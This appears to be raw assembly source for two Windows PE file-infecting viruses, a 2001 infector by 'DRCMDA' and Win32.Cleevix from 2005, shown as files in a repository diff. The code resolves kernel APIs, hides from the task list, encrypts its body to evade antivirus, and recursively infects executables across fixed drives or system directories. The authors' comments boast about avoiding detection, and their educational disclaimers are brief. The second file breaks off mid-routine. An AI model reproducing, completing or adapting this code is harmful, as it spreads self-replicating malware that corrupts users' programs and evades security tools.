; VIRUS ON MY OWN. I ALSO TRIED TO OPTIMIZE COMMON STRUCTURES LIKE
; INFECTING, API-BASE SEARCHING, DIR-SCANNING, ... I WOULD NEVER
; SPREAD A VIRUS, I WROTE THIS JUST TO GET A BETTER GRIP WITH THE
; PE HEADER ;) HEHE BYE... - DRCMDA [ DRCMDA@GMX.DE ] (C) 2001
; -----------------------------------------------------------------
; P L E A S E D O N O T C O M P I L E (A N D R U N !) T H I S
; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
.486
.MODEL FLAT, STDCALL
OPTION CASEMAP: NONE
INCLUDE \MASM32\INCLUDE\KERNEL32.INC
INCLUDELIB \MASM32\LIB\KERNEL32.LIB
VIRUS_SIZE EQU VIRUS_END - VIRUS_START
MAX_PATH EQU 104H
OF_READ EQU 000H
GHND EQU 002H OR 040H
FILE_ATTRIBUTE_NORMAL EQU 080H
FILE_ATTRIBUTE_DIR EQU 010H
DRIVE_FIXED EQU 003H
.CODE
FIRST_GEN:
PUSH 0
CALL ExitProcess
VIRUS_START:
PUSHAD
CALL DELTA
DELTA: POP EBP
SUB EBP, DELTA ; EBP = DELTA OFFSET
XOR_KEY:MOV DH,0 ; WILL BE PATCHED LATER...
LEA ESI, [ EBP + E_START ] ; SO NO XOR EDX, EDX :)
PUSH ESI
MOV ECX, VIRUS_END - E_START
;________________ _ _ _ [ -ENCRYPT- ] _ _ _ __
ENCRYPT:XOR BYTE PTR [ ESI ], DH ; EN/DE-CRYPTS THE VIRUS_BDY
ROL DH, 1 ; VERY LAME I KNOW...
INC ESI
DEC ECX
JNZ ENCRYPT
RET
E_START:CALL GET_KERNEL ; GET KERNEL BASE
MOV ECX, 27
LEA ESI, [ EBP + ___KERNEL32 ]
CALL GET_APIS ; GET KERNEL API'S
CALL _M01
DB "blablabla",0
_M01: PUSH 1
PUSH 0
CALL [ _CREATEMUTEX ]
CALL [ _GETLASTERROR ]
TEST EAX, EAX
JNZ MUTEX_EXIST
PUSH 1
PUSH 0
CALL [ EBP + _RSP ] ; TRY TO HIDE FROM TASK-LIST
CALL [ EBP + _GETCOMMANDLINE ] ; START REAL HOST WITH WINEXIT
PUSH 1 ; NOW THE USER WON'T NOTIZE
PUSH EAX ; ANY LOADING-TIME INCREASE
CALL [ EBP + _WINEXEC ]
CALL INFECT_EVERYTHING ; THE NAME SAYS ALL :)
PUSH 0
PUSH 0
CALL [ EBP + _BEEP ]
PUSH 0
CALL [ EBP + _EXITPROCESS ] ; WE'RE DONE, THE ENTIRE FUCKING
; COMPUTER SHOULD BE INFECTED :)
MUTEX_EXIST:
ERR_EXT:POPAD
HRETURN:PUSH DWORD PTR OFFSET FIRST_GEN ; RETURN TO HOST
RET ; WILL BE PATCHED LATER
;________________ _ _ _ [ -GET_KERNEL- ] _ _ _ __
GET_KERNEL: ; RETURNS THE KERNEL BASE
MOV ECX, [ ESP + 9 * 4 ] ; SIMPLE BUT SMALL :)
@@: DEC ECX
MOVZX EDX, WORD PTR [ ECX + 03CH ] ; EDX = POINTER TO PE_HDR
CMP ECX, [ ECX + EDX + 034H ] ; COMPARE CURRENT BASE WITH
JNZ @B ; THE KERNEL IMAGE_BASE (MZ)
MOV [ EBP + _KERNEL ], ECX ; STORE RESULT
MOV [ EBP + _DEFAULT ], ECX
RET
;________________ _ _ _ [ -GET_APIS- ] _ _ _ __
GET_APIS: ; SCANS THROUGH API TABLE
INC ESI ; AND RETURNS ADDRESSES
PUSH ECX
CALL GET_API ; SEARCH SINGLE API ADDRESS
POP ECX
MOVZX EBX, BYTE PTR [ ESI - 1 ]
ADD ESI, EBX ; STORE ADDRESS IN THE
MOV [ ESI ], EAX ; API TABLE...
ADD ESI, 4
LOOP GET_APIS ; NEXT ONE
RET
;________________ _ _ _ [ -GET_API- ] _ _ _ __
GET_API: ; SCANS FOR A SINGLE API ADR
MOV EDX, [ EBP + _DEFAULT ] ; EDX = DEFAULT MODULE BASE
ADD EDX, [ EDX + 03CH ] ; + OFFSET PE_HEADER
MOV EDX, [ EDX + 078H ] ; EDX = PTR EXPORT_DIR RVA
ADD EDX, [ EBP + _DEFAULT ] ; + BASE
MOV EDI, [ EDX + 020H ] ; EDI = PTR ADDRESS_OF_NAMES RVA
ADD EDI, [ EBP + _DEFAULT ] ; + BASE
MOV EDI, [ EDI ] ; EDI = PTR ADR_OF_NAMES RVA
ADD EDI, [ EBP + _DEFAULT ] ; + BASE
MOV EAX, [ EDX + 018H ] ; EAX = NUMBER_OF_NAMES
XOR EBX, EBX
NXT_ONE:INC EBX
MOVZX ECX, BYTE PTR [ ESI - 1 ] ; LENGHT OF SPEZIFED API NAME
PUSH ESI
PUSH EDI
REPZ CMPSB ; COMPARE API NAME WITH
POP EDI ; EXPORT ENTRY
POP ESI
JZ FOUND
PUSH EAX
XOR AL, AL
SCASB ; GET NEXT ONE
JNZ $ - 1
POP EAX
DEC EAX ; DECREASE NUMBER_OF_NAMES
JZ ERR_EXT
JMP NXT_ONE
FOUND: MOV ECX, [ EDX + 024H ] ; ECX = PTR NBR_NAME_ORDS RVA
ADD ECX, [ EBP + _DEFAULT ] ; + BASE
DEC EBX
MOVZX EAX, WORD PTR [ ECX + EBX * 2 ] ; EAX = ORDINAL OF FUNCTION
MOV EBX, [ EDX + 01CH ] ; EBX = PTR ADR_OF_FUNCTIONS RVA
ADD EBX, [ EBP + _DEFAULT ] ; + BASE
MOV EAX, [ EBX + EAX * 4 ] ; EAX = FUNCTION RVA!!!!
ADD EAX, [ EBP + _DEFAULT ] ; + BASE
RET
;________________ _ _ _ [ -INFECT_EVERYTHING- ] _ _ _ __
INFECT_EVERYTHING: ; INFECTS EVERY FIXED DRIVE!!!
LEA EAX, [ EBP + DRIVES ] ;
MOV [ EBP + OFS ], EAX ; GET DRIVE STRINGS
PUSH EAX
PUSH 50
CALL [ EBP + _GETLOGICALDRIVESTRINGS ]
LOOP_: PUSH [ EBP + OFS ]
CALL [ EBP + _GETDRIVETYPE ] ; IS IT A FIXED DRIVE???
CMP EAX, DRIVE_FIXED
JNZ BAHHH
PUSH [ EBP + OFS ]
CALL [ EBP + _SETCURRENTDIR ]
CALL INFECT_DRIVE ; LET'S INFECT IT :)
BAHHH: ADD [ EBP + OFS ], 4 ; GET NEXT CANDIDATE
MOV EAX, [ EBP + OFS ]
CMP BYTE PTR [ EAX ], 0
JNZ LOOP_
RET
;________________ _ _ _ [ -INFECT_DRIVE- ] _ _ _ __
INFECT_DRIVE: ; INFECTS THE WHOLE DRIVE :)
LEA EAX, [ EBP + W32FINDDATA ] ;
PUSH EAX
LEA EAX, [ EBP + FILE_MASK ]
PUSH EAX
CALL [ EBP + _FINDFIRSTFILE ] ; START SEARCHING
INC EAX
JZ _S_OUT
DEC EAX
MOV [ EBP + S_HANDLE ], EAX
_S_SCAN:CMP [ EBP + F_OATTRIBS ], FILE_ATTRIBUTE_DIR
JNZ NODIR
cmp BYTE PTR [ EBP + FILENAME ],"." ; "." AND ".." ARE NOT NEEDED...
JZ _NEXT
LEA EAX, [ EBP + FILENAME ] ; IF WE FOUND A DIRECTORY WE SET
PUSH EAX ; SET THE CUR DIR TO THIS PLACE AND
CALL [ EBP + _SETCURRENTDIR ] ; CONTINUE THE SEARCH THERE...
PUSH [ EBP + S_HANDLE ] ; SAVE SEARCH HANDLE
call INFECT_DRIVE ; RECURSIVE
POP [ EBP + S_HANDLE ] ; GET OLD HANDLE AND CONTINUE
JMP _NEXT
NODIR: LEA EAX, [ EBP + FILENAME ]
PUSH EAX
CALL [ EBP + _LSTRLEN ] ; EXCUSE MY LAZYNESS :)
CMP DWORD PTR [ EBP + FILENAME + EAX - 4 ], "EXE."
JZ _1
CMP DWORD PTR [ EBP + FILENAME + EAX - 4 ], "exe."
JNZ _NEXT
_1: CMP [ EBP + FILESIZEH ], 0 ; ONLY FILES UNDER 4 GIGS...
JNZ _NEXT
CALL INFECT_FILE ; EXE FOUND SO INFECT IT!
_NEXT: PUSH 100 ; WAIT 100ms NOW THE USER SHOULDN'T
CALL [ EBP + _SLEEP ] ; NOTIZE ANY DISK-USAGE... (HOPE SO)
LEA EAX, [ EBP + W32FINDDATA ]
PUSH EAX
PUSH [ EBP + S_HANDLE ]
CALL [ EBP + _FINDNEXTFILE ] ; GRAB SEARCH_HANDLE AND SEARCH
TEST EAX, EAX ; MORE FILES THAT ARE MATCHING TO
JNZ _S_SCAN ; OUR PATTERN ("*")...
LEA EAX, [ EBP + BACK ]
PUSH EAX
CALL [ EBP + _SETCURRENTDIR ] ; ".." MEANS GET ONE DIR BACK
PUSH [ EBP + S_HANDLE ]
CALL [ EBP + _FINDCLOSE ]
_S_OUT: RET
;________________ _ _ _ [ -OPEN_FILE- ] _ _ _ __
INFECT_FILE: ; OPENS A FILE AND ALLOCATE MEM
PUSH FILE_ATTRIBUTE_NORMAL ; I DON'T USE FILEMAPPING COZ
LEA EAX, [ EBP + FILENAME ] ; I SIMPLY HATE IT... IMAGINE
PUSH EAX ; YOU MAP A FILE AND BEGIN TO
CALL [ EBP + _SETFILEATTRIBUTES ] ; MAKE THE FIRST CHANGES, NOW
; YOU REALIZE THE PE IS NOT
PUSH OF_READ ; VALID OR CORRUPTED (PACKED
LEA EAX, [ EBP + FILENAME ] ; FILES OR SOME MS PE'S
PUSH EAX ; [OUTLOOK])... THIS PE SHOULD
CALL [ EBP + __LOPEN ] ; BE HISTORY NOW :) I USED IT
MOV [ EBP + FILEHANDLE ], EAX ; BEFORE AND MUST SAY THAT
MOV EAX, [ EBP + FILESIZE ] ; I HAD TONS OF PROBLEMS WITH
ADD [ EBP + MAPSIZE ], EAX ; THIS TECHNIQUE...
PUSH [ EBP + MAPSIZE ]
PUSH GHND
CALL [ EBP + _GLOBALALLOC ]
MOV [ EBP + H_BUFFER ], EAX
PUSH EAX
CALL [ EBP + _GLOBALLOCK ] ; ALLOCATE MEM FOR THE FILE +
TEST EAX, EAX ; VIRUS_BODY
JZ _EXIT
MOV [ EBP + M_BUFFER ], EAX
PUSH [ EBP + FILESIZE ]
PUSH [ EBP + M_BUFFER ]
PUSH [ EBP + FILEHANDLE ]
CALL [ EBP + __LREAD ] ; READ ENTIRE FILE TO BUFFER
PUSH [ EBP + FILEHANDLE ]
CALL [ EBP + __LCLOSE ]
;________________ _ _ _ [ -INFECT_FILE- ] _ _ _ __
MOV EDI, [ EBP + M_BUFFER ] ; EDI = POINTER TO MEM BLOCK
CMP WORD PTR [ EDI ], "ZM" ; DO SOME CHECKS (MZ/PE/INFMARK)
JNZ _EXIT
ADD EDI, [EDI + 03CH] ; EDI = POINTER TO PE_HDR
CMP WORD PTR [ EDI ], "EP"
JNZ _EXIT
CMP DWORD PTR [ EDI + 04CH ], 0
JNZ _EXIT
; RETURN LAST SECTION
MOV ECX, [ EDI + 074H ] ; ECX = NUMBER_OF_RVA_AND_SIZES
LEA ECX, [ ECX * 8 + EDI ] ; x 8 + OFFSET PE_HEADER
MOVZX EAX, WORD PTR [ EDI + 006H ] ; EAX = NUMBER_OF_SECTIONS
DEC EAX ; - 1
LEA EBX, [ EAX + EAX * 4 ] ; EBX = EAX x 28H
LEA EBX, [ EBX * 8 ] ; ...
LEA EBX, [ EBX + ECX + 078H ] ; EBX = EBX + ECX + 078H
MOV EAX, VIRUS_SIZE
XADD [ EBX + 008H ], EAX ; CHANGE VIRTUALSIZE
CMP EAX, [ EBX + 010H ]
JA _EXIT
PUSH EAX
PUSH DWORD PTR [ EBX + 010H ]
ADD EAX, VIRUS_SIZE
XOR EDX, EDX
MOV ECX, [ EDI + 03CH ]
DIV ECX
INC EAX
IMUL EAX, ECX
MOV [ EBX + 010H ], EAX ; CHANGE SIZE_OF_RAW_DATA
POP ECX
MOV EAX, [ EBX + 010H ]
SUB EAX, ECX ; CHANGE SIZE_OF_IMAGE
ADD [ EDI + 050H ], EAX
; CHANGE ATTRIBS & INFMARK
OR DWORD PTR [ EBX + 024H ], 0C0000000H
MOV DWORD PTR [ EDI + 04CH ], "BDHP"
POP EAX
ADD EAX, [ EBX + 00CH ]
XCHG [ EDI + 028H ], EAX ; CHANGE ENTRY_POINT
ADD EAX, [ EDI + 034H ]
MOV EDI, [ EBX + 014H ] ; VIRUS_POS = VIRT_ADR +
ADD EDI, [ EBX + 008H ] ; VIRT_SIZE
MOV ECX, VIRUS_SIZE
SUB EDI, ECX
ADD EDI, [ EBP + M_BUFFER ]
LEA ESI, [ EBP + VIRUS_START ]
REP MOVSB ; WRITE VIRUS_BODY TO BUFFER
;________________ _ _ _ [ -CLOSE_FILE- ] _ _ _ __
ADD BYTE PTR [ EBP + XOR_KEY + 1 ], 10
MOV DH, BYTE PTR [ EBP + XOR_KEY + 1 ]
MOV BYTE PTR [ EDI - ( VIRUS_END - XOR_KEY ) + 1 ], DH
MOV [ EDI - ( VIRUS_END - HRETURN ) + 1 ], EAX
LEA ESI, [ EDI - ( VIRUS_END - E_START ) ]
MOV ECX, VIRUS_END - E_START
CALL ENCRYPT ; ENCRYPT VIRUS_BODY
PUSH 0 ; TRUNCATE FILE AND OPEN
LEA EAX, [ EBP + FILENAME ] ; FILE FOR WRITE ACCESS
PUSH EAX ; (FILE ATTRIBS ARE SET ABOVE)
CALL [ EBP + __LCREAT ]
INC EAX
JZ _EXIT
MOV EAX, [ EBX + 014H ] ; FILESIZE = VIRT_ADR +
ADD EAX, [ EBX + 010H ] ; SIZE_OF_RAW_DATA
PUSH EAX
PUSH [ EBP + M_BUFFER ] ; WRITE BUFFER TO FILE...
PUSH [ EBP + FILEHANDLE ] ; CLOSE FILE...
CALL [ EBP + __LWRITE ] ; GET RID OF THOSE MEMORY
PUSH [ EBP + FILEHANDLE ] ; POINTERS AND FREE MEMORY...
CALL [ EBP + __LCLOSE ] ; SET OLD FILE ATTRIBUTES
_EXIT: PUSH [ EBP + M_BUFFER ]
CALL [ EBP + _GLOBALUNLOCK ]
PUSH [ EBP + H_BUFFER ]
CALL [ EBP + _GLOBALFREE ]
PUSH [ EBP + F_OATTRIBS ]
LEA EAX, [ EBP + FILENAME ]
PUSH EAX
CALL [ EBP + _SETFILEATTRIBUTES ]
RET
;________________ _ _ _ [ -VIRUS_DATA- ] _ _ _ __
___KERNEL32: ;
DB 06,"_lopen" ; API TABLE
__LOPEN DD 0 ; WILL BE FILLED UP WITH ADR'S
DB 06,"_lread" ; FROM A SPEZIFED MODULE-EXPORT
__LREAD DD 0 ; TABLE (IN THIS CASE KERNEL32)
DB 07,"_lwrite"
__LWRITE DD 0
DB 07,"_lclose"
__LCLOSE DD 0
DB 07,"_lcreat"
__LCREAT DD 0
DB 11,"GlobalAlloc"
_GLOBALALLOC DD 0
DB 10,"GlobalLock"
_GLOBALLOCK DD 0
DB 12,"GlobalUnlock"
_GLOBALUNLOCK DD 0
DB 10,"GlobalFree"
_GLOBALFREE DD 0
DB 13,"FindFirstFile"
_FINDFIRSTFILE DD 0
DB 12,"FindNextFile"
_FINDNEXTFILE DD 0
DB 09,"FindClose"
_FINDCLOSE DD 0
DB 17,"SetFileAttributes"
_SETFILEATTRIBUTES DD 0
DB 17,"GetFileAttributes"
_GETFILEATTRIBUTES DD 0
DB 19,"SetCurrentDirectory"
_SETCURRENTDIR DD 0
DB 22,"GetLogicalDriveStrings"
_GETLOGICALDRIVESTRINGS DD 0
DB 12,"GetDriveType"
_GETDRIVETYPE DD 0
DB 07,"lstrlen"
_LSTRLEN DD 0
DB 04,"Beep"
_BEEP DD 0
DB 11,"CreateMutex"
_CREATEMUTEX DD 0
DB 12,"ReleaseMutex"
_RELEASEMUTEX DD 0
DB 12,"GetLastError"
_GETLASTERROR DD 0
DB 11,"ExitProcess"
_EXITPROCESS DD 0
DB 22,"RegisterServiceProcess"
_RSP DD 0
DB 14,"GetCommandLine"
_GETCOMMANDLINE DD 0
DB 07,"WinExec"
_WINEXEC DD 0
DB 05,"Sleep"
_SLEEP DD 0
_KERNEL DD 0 ; BASE PLACEHOLDERS
_DEFAULT DD 0
MAPSIZE DD VIRUS_SIZE + 1000H
FILEHANDLE DD 0
H_BUFFER DD 0
M_BUFFER DD 0
W32FINDDATA: ; WIN32_FIND_DATA STRUC
F_OATTRIBS DD 0
DD 6 DUP ( 0 )
FILESIZEH DD 0
FILESIZE DD 0
DD 2 DUP ( 0 )
FILENAME DB MAX_PATH DUP ( 0 )
DB 14 DUP ( 0 )
FILE_MASK DB "*", 0
DRIVES DB 50 dup ( 0 )
BACK DB "..", 0
S_HANDLE DD 0
OFS DD 0
VIRUS_END:
END VIRUS_START
Win32/Infector/Win32.Cleevix.asm
+717
View File
@@ -0,0 +1,717 @@
;-------------------------------------------------------------------------------
;Win32.Cleevix (c)opyright 2005 by lclee_vx
;
;Win32.Cleevix is a PE infector on Windows 9x/2K/XP with simple encryption, anyhow,
;its not detect by Norton Antivirus. :)!!
;
;
;
;Description
;-----------
;When a file infected by Win32.Cleevix is executed, the virus start the process
;as below:
;
;1) Retrieve the base address of Kernel32.dll
;2) Scans the Export Table of Kernel32.dll for the API Functions
;3) Retrieve API functions by scanning others *.dll file. For example, retrieve
; MessageBox function from User32.dll file.
;4) Scan the Current, Windows and System directory, infect all the *exe files.
; Infected files will grow by about 2.99 Kilobyte
;5) The virus do not try to harm/damage the system, its just patch itself to the
; PE files. Anyhow, it might bring down the system as the scanning process running.
;6) The virus apply the simple encryption, its not detected by Norton Antivirus (tested)
;
;
;That is about all folks. The code is heavily commented, so, it should be easy
;enough to follow.
;
; Disclaimer
; ----------
;THIS CODE IS MEANT FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR CANNOT BE HELD
;RESPONSIBLE FOR ANY DAMAGE CAUSED DUE TO USE, MISUSE OR INABILITY TO USE THE
;SAME
;
;
;Author : lclee_vx
;Group : F-13 Labs
;Web : http://f13.host.sk
;Email : lclee_vx@yahoo.com
;----------------------------------------------------------------------------------
.386p
.model flat, stdcall
option casemap:none
jumps
.data
;------------------------------------------------------------------------------
;Start The Code
;------------------------------------------------------------------------------
.code
VirusStart:
call delta
delta:
pop ebp
mov eax, ebp
sub ebp, offset delta
sub eax, RedundantSize
sub eax, 1000h
NewEip equ $-4
mov dword ptr [ebp+AppBase], eax
mov esi, [esp]
and esi, 0FFFF0000h
pushad
call Crypt
popad
CryptStart:
call GetK32
mov dword ptr [ebp+offset aKernel32], eax ;save kernel32.dll
;-------------------------------------------------------------------------------
;here we looking for APIs function
;-------------------------------------------------------------------------------
lea edi, [ebp+offset @@Offsetz]
lea esi, [ebp+offset @@Namez]
call GetApis
call SpecialApi
call DirScan
CryptEnd:
cmp ebp, 0
je FirstGeneration
ReturnHost:
mov eax, 12345678h
org $-4
OldEip dd 00001000h
mov eax, dword ptr [ebp+offset OldEip]
jmp eax
ret
;-------------------------------------------------------------------------------
;1) Changing to Windows directory, System directory and current directory
;2) remember size buffer have to set > Max_Path (260)
;-------------------------------------------------------------------------------
DirScan:
push 128h ;have to set Buffer size > 260
lea eax, [ebp+offset WindowsDir] ;retrieve the path of Windows
;Directory
push eax
mov eax, dword ptr [ebp+offset aGetWindowsDirectoryA]
call eax
push 128h ;buffer size > 260
lea eax, [ebp+offset SystemDir] ;retrieve the path of System
push eax ;directory
mov eax, [ebp+offset aGetSystemDirectoryA]
call eax
lea eax, [ebp+offset CurrentDir] ;retrieve the path of Current
push eax ;directory
push 128h ;buffer size > 260
mov eax, [ebp+offset aGetCurrentDirectoryA]
call eax
lea eax, [ebp+offset WindowsDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles ;start searching the target files
lea eax, [ebp+offset SystemDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles
lea eax, [ebp+offset CurrentDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles
ret
;-------------------------------------------------------------------------------
;1) Search the target files (*.exe)
;2) Trying Infect 3 files
;-------------------------------------------------------------------------------
SearchFiles:
push ebp ;save ebp
lea eax, dword ptr [ebp+offset Win32FindData] ;load the Win32_Find_Data structure
push eax
lea eax, [ebp+offset Mark] ;search *.exe
push eax
mov eax, [ebp+offset aFindFirstFileA] ;start searching
call eax
pop ebp
inc eax ;check with eax=FFFFFFFF+1
jz SearchClose ;fail :(
dec eax ;get the original FileHandle
mov dword ptr [ebp+offset SearchHandle], eax ;save FileHandle
mov esi, offset Win32FindData.FileName ;esi=pointer to FileName
add esi, ebp
mov dword ptr [ebp+offset FilePointer], esi ;save the Pointer to FileName
cmp [Win32FindData.FileSizeHigh+ebp], 0 ;high 32 bits of FileSize
jne SearchNext ;way too big for us
mov ecx, [Win32FindData.FileSizeLow+ebp] ;ecx=File Size
mov dword ptr [ebp+offset NewFileSize], ecx ;NewFileSize will change in InfectFiles
mov dword ptr [ebp+offset OriFileSize], ecx ;routine
push dword ptr [ebp+offset OldEip]
call InfectFiles
pop dword ptr [ebp+offset OldEip]
dec dword ptr [ebp+offset Counter] ;Counter - 1
cmp dword ptr [ebp+offset Counter], 0
je SearchHandleClose
SearchNext:
push ebp
mov eax, dword ptr [ebp+offset Win32FindData]
push eax
mov eax, dword ptr [ebp+offset SearchHandle] ;eax=Search Handle
push eax
mov eax, [ebp+offset aFindNextFileA]
call eax
pop ebp
cmp eax, 0 ;error?
je SearchHandleClose ;done
mov esi, offset Win32FindData.FileName
add esi, ebp
mov dword ptr [ebp+offset FilePointer], esi ;esi=File Pointer
cmp [Win32FindData.FileSizeHigh+ebp], 0
jne SearchNext
mov ecx, [Win32FindData.FileSizeLow+ebp] ;ecx=File Size
mov dword ptr [ebp+offset NewFileSize], ecx ;save it
mov dword ptr [ebp+offset OriFileSize], ecx
push dword ptr [ebp+offset OldEip]
call InfectFiles
pop dword ptr [ebp+offset OldEip]
dec dword ptr [ebp+offset Counter] ;Counter - 1
cmp dword ptr [ebp+offset Counter], 0
jne SearchNext
SearchHandleClose:
push dword ptr [ebp+offset SearchHandle]
mov eax, [ebp+offset aFindClose]
call eax
cmp eax, 0
je SearchClose
SearchClose:
ret
;----------------------------------------------------------------------------------
;Here start to set the file attributes, mapping files and infect the files
;(1) save the original FileSize, FileAttribute
;(2) Open the file with API CreateFileA. if error,
;----------------------------------------------------------------------------------
InfectFiles:
pushad ;save all the register before
;start infect
mov dword ptr [ebp+offset InfectFlag], 0
mov ecx, dword ptr [ebp+offset NewFileSize]
cmp ecx, MinimumFileSize ;minimum FileSize=400h
jb JumpOut
add ecx, total_size
mov dword ptr [ebp+offset NewFileSize], ecx
push ebp
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aGetFileAttributesA]
call eax
pop ebp
mov dword ptr [ebp+offset FileAttribute], eax ;save the original file attribute
push ebp
push 00000080h ;set file attribute = any
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aSetFileAttributesA]
call eax
pop ebp
cmp eax, 0 ;error?
jz ErrorOpenExe
push ebp
push 0h
push 00000080h
push 00000003h
push 0h
push 00000001h
push 80000000h or 40000000h
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aCreateFileA]
call eax
pop ebp
inc eax ;if error, eax=0FFFFFFFFh. eax = eax+1
cmp eax, 0 ;error?
jz ErrorOpenExe
dec eax
mov dword ptr [ebp+offset FileHandle], eax ;save the FileHandle
push ebp
push dword ptr [ebp+offset NewFileSize]
push 0h
mov eax, [ebp+offset aGlobalAlloc]
call eax
pop ebp
cmp eax, 0h
jz ErrorBuffer ;error?
mov dword ptr [ebp+offset MemoryHandle], eax ;save
push ebp
lea eax, [ebp+offset ByteRead]
push 0h
push eax
push dword ptr [ebp+offset OriFileSize]
push dword ptr [ebp+offset MemoryHandle]
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aReadFile]
call eax
pop ebp
cmp eax, 0h ;error?
jz ErrorReadExe
push ebp
push 0h
push 0h
push 0h
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aSetFilePointer]
call eax
pop ebp
inc eax ;if fail, eax=0FFFFFFFFh. eax = eax+1
cmp eax, 0h
jz ErrorReadExe
mov ebx, dword ptr [ebp+offset MemoryHandle]
mov esi, dword ptr [ebp+offset MemoryHandle]
cmp word ptr [esi], "ZM"
jnz ErrorReadExe
xor eax, eax ;eax = 0
mov eax, dword ptr [esi+3ch] ;eax = offset PE Header
add esi, eax ;esi = point to PE Header
cmp dword ptr [esi], "EP" ;PE file ?
jz StartInfect
mov dword ptr [ebp+offset InfectFlag], 0FFh
jmp ErrorReadExe
StartInfect:
mov dword ptr [ebp+offset PEHeader], esi
cmp dword ptr [esi+4ch], "31" ;infected?
jz InfectError
mov dword ptr [esi+4ch], "31" ;put the infected symbol
mov ebx, [esi+74h] ;ebx=NumberOfRvaAndSizes
shl ebx, 3 ;ebx=ebx*8
xor eax, eax ;eax=0
mov ax, word ptr [esi+06h] ;ax = Number of Sections
dec eax ;eax=eax-1
mov ecx, 28h
mul ecx ;eax=eax*ecx
add eax, ebx
add esi, 78h
add esi, eax ;now esi point to Last Section
mov edi, dword ptr [ebp+offset PEHeader] ;edi=PE Header
mov eax, [esi+0ch] ;eax= VirtualAddress
add eax, dword ptr [esi+10h] ;eax = VirtualAddress+SizeOfRawData
mov dword ptr [ebp+offset NewEip], eax
xchg eax, [edi+28h] ;eax = Original AddressOfEntryPoint
add eax, [edi+34h] ;eax= Original AddressOfEntryPoint+ImageBase
mov dword ptr [ebp+offset OldEip], eax ;save as OldEip
mov ecx, total_size
add [esi+08h], ecx ;New VirtualSize= Original VirtualSize+VirusSize
mov eax, [esi+08h] ;eax = New VirtualSize
add eax, [esi+0ch] ;eax = New VirtualSize+VirtualAddress
mov [edi+50h], eax ;eax=SizeOfImage
mov eax, [esi+10h] ;eax=SizeOfRawData
add [esi+10h], ecx ;New SizeOfRawData= Old SizeOfRawData+VirusSize
or dword ptr [esi+24h], 0A0000020h
mov edi, [esi+14h]
mov ebx, dword ptr [ebp+offset MemoryHandle]
add edi, ebx
add edi, eax
mov esi, offset VirusStart
add esi, ebp
pushad
mov byte ptr [ebp+offset CryptKey], 0ffh
call Crypt
popad
rep movsb
call Crypt
lea eax, [ebp+offset ByteRead]
push ebp
push 0h
push eax
push dword ptr [ebp+offset NewFileSize]
push dword ptr [ebp+offset MemoryHandle]
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aWriteFile]
call eax
pop ebp
InfectError:
ErrorReadExe:
push ebp
push dword ptr [ebp+offset MemoryHandle]
mov eax, [ebp+offset aGlobalFree]
call eax
pop ebp
ErrorBuffer:
push ebp
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aCloseHandle]
call eax
pop ebp
ErrorOpenExe:
push ebp
push dword ptr [ebp+offset FileAttribute]
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aSetFileAttributesA]
call eax
pop ebp
jmp InfectCheck
InfectFail:
stc
jmp JumpOut
InfectCheck:
cmp dword ptr [ebp+offset InfectFlag], 0FFh
jz InfectFail
clc
JumpOut:
popad
ret
;----------------------------------------------------------------------------------
;Searching Kernel32.dll address
;----------------------------------------------------------------------------------
GetK32 PROC
ScanK32:
cmp word ptr [esi], "ZM"
je K32Found
sub esi, 1000h
jmp ScanK32
K32Found:
mov eax, esi
ret
GetK32 endp
;------------------------------------------------------------------------------------
;Searching The APIs function
;edi=API offset
;esi=API name
;------------------------------------------------------------------------------------
GetApis PROC
@@1:
mov eax, dword ptr [ebp+aKernel32]
push esi
push edi
call GetApi
pop edi
pop esi
mov [edi], eax ;store API address in eax ----> edi
add edi, 4
@@3:
inc esi
cmp byte ptr [esi], 0
jne @@3
inc esi
cmp byte ptr [esi], 0FFh ;ended?
jnz @@1
ret
GetApis endp
GetApi PROC
mov ebx, [eax+3ch] ;ebx=offset PE header
add ebx, eax ;ebx=point to PE header
mov ebx, [ebx+78h] ;ebx=point to ExportDirectory Virtual Address
add ebx, eax ;normalize, ebx=point to ExportDirectory
xor edx, edx ;edx=0
mov ecx, [ebx+20h] ;ecx=point to AddressOfNames
add ecx, eax ;normalize
push esi ;save to stack
push edx ;save to stack
NextApi:
pop edx
pop esi
inc edx ;edx=the index into AddressOfOrdinals+1
mov edi, [ecx] ;edi=API function export by Kernel32.dll
add edi, eax ;normalize
add ecx, 4 ;point to next API function
push esi ;save to stack
push edx
CompareApi:
mov dl, [edi] ;dl=API function export by Kernel32.dll
mov dh, [esi] ;dh=API function we looking for
cmp dl, dh ;match?
jne NextApi ;not match....ok...next API
inc edi ;if match, compare next byte
inc esi
cmp byte ptr [esi], 0 ;finish?
je GetAddr ;jmp to get the address of API function
jmp CompareApi
GetAddr:
pop edx
pop esi
dec edx ;edx-1 (because edx=index point to zero -finish)
shl edx, 1 ;edx=edx*2
mov ecx, [ebx+24h]
add ecx, eax
add ecx, edx ;ecx=ordinals
xor edx,edx
mov dx, [ecx]
shl edx, 2 ;edx=edx*4
mov ecx, [ebx+1ch] ;ecx=RVA AddressOfFunctions
add ecx, eax ;normalize
add ecx, edx
add eax, [ecx] ;eax=address of API function we looking for
ret
GetApi endp
;-----------------------------------------------------------------------------
;call special API MessageBoxA
;-----------------------------------------------------------------------------
SpecialApi proc
push offset User32Dll
mov eax, dword ptr [ebp+offset aLoadLibraryA]
call eax
mov esi, offset sMessageBoxA
push esi
push eax
mov eax, dword ptr [ebp+offset aGetProcAddress]
call eax
mov dword ptr [ebp+offset aMessageBoxA], eax
ret
SpecialApi endp
;------------------------------------------------------------------------------
;Encrypt/Decrypt Virus Data
;------------------------------------------------------------------------------
Crypt:
mov esi, offset CryptStart
